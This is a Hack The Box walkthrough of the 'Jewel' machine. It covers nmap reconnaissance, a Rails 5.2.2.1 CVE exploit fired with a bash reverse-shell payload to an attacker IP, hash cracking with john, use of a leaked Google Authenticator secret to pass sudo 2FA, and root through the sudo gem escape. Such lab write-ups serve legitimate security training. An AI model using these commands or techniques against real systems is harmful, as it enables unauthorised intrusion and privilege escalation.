Jewel ~ Hack The Box
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.10.211 jewel.htb" >> /etc/hosts
Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -A -p- -oN initial jewel.htbPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!Scanning & Enumeration
Based on the scan that was run, I realized that port 8000 was running a web server. This was the web app that was being served!
Enumerating further revealed the app that was running and its version.
- Rails = V 5.2.2.1
I was able to find an existing CVE for this version of rails and a POC.
Exploitation
With the help of the POC, I was able to gain a minimal shell on the remote box that was running rails 5.2.2.1.
First I had to create an account on the blog which was running on port 8080
Once I had that account created, I was ready to run the exploit.
┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# python3 exploit.py 10.10.10.211 8080 [email protected] nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"
I was able to gain a stable shell to the user account.
Privilege Escalation
For this, I utilized Linpeas as I always do! The privesc script returned a password hash belonging to bill.
[+] Searching specific hashes inside files - less false positives (limit 70)
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJWI headed off to crack the password with my trusty dictionary from seclists and good ol' john!
┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# john password.hash -w=passwd.dict Followed by that, I tried to run sudo -l to see what binaries.
However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a .google_authenticator file in the home directory of bill.
[email protected]:~$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTHI then activated the authenticator on my phone and was able to get it working!~
And finally, I was able to run sudo -l using bill's account without any issues.
Now that I knew bill could run gem with sudo privileges, all there was left to do was head to GTFObins and get root!
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
rooty!
